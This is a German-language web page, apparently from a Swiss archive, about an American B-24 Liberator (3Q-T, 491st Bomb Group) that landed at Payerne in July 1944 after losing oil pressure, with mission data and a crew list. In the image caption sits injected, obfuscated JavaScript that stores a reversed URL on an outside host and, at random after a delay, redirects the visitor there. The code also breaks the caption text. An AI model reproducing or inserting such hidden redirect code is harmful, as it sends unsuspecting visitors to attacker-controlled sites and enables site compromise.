Ereignisse

Öldruck verloren

Der Bomber mit dem Kennzeichen 3Q-T ist nach einem Einsatz über München in Payerne gelandet. Am 11.10.1945 nach Burtonwood zurück gekehrt.

1st Lt Gordon W. MacDonald l<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andete seine B-24 sicher in Payerne. (157_1)“ width=“800″ height=“390″ /> 1st Lt Gordon W. MacDonald landete seine B-24 sicher in Payerne. (157_1)

Der Bomber der 8th Air Force, 491st Bomb Group mit dem Kennzeichen 3Q-T ist nach einem Einsatz über München in Payerne gelandet und am 11.10.1945 nach Burtonwood zurückgekehrt. An der Maschine von 1Lt Gordon W. MacDonald wurde bis kurz vor dem Start gearbeitet. Mac Donald und seine Crew flogen diese Liberator zum ersten Mal und hatte auf diesem Flug keinen Bombenschützen an Bord. In der Nähe von Stuttgart verloren die Motoren Nummer 1 und 2 Öldruck. Nummer 1 musste schon bald in Segelstellung gebracht werden. Schnell verlor die Maschine Höhe und konnte nicht mehr mit der Formation mithalten. Die Crew entledigte sich der Bomben und drehte Richtung Schweiz ab. Die Maschine landete sicher in Payerne.


Ereignissdatum 12.7.1944
Ort Payerne
Kanton VD
Ereignis Landung
Nation Amerika
Flugzeugart Bomber
Flugzeugtyp B-24 Liberator
Flugzeugbezeichnung B-24 H-25-DT
Einteilung 8th Air Force, 491 Bomb Group, 855th Squadron
Basis Metfield (GB)
Auftrag Bombardierung
Einsatzziel München (D)
Rückkehr 11.10.1945 Rückkehr nach Burtonwood (GB)
Werknummer 42-51113
Kennzeichen 3Q-T
CH Archiv Nr. A089
US MACR Nr. 6994
Besatzung Pilot: Gordon W. Mac Donald, 1st Lt
Copilot: Kenneth Clark, 2nd Lt
Navigator: Leon H. Sobel, 2nd Lt
Engineer: Noel L. Richardson, S/Sgt
Radio: Henry Diener, Jr., S/Sgt
Ball Turret: Wayne G. Turner, S/Sgt
Right Waist: Wilbur E. Zittrauer, S/Sgt
Left Waist: Rupert I. Hutchinson, S/Sgt
Tail Gunner: Floyd Baker, S/Sgt
Quelle Cockpit
Autor Hans-Heiri Stapfer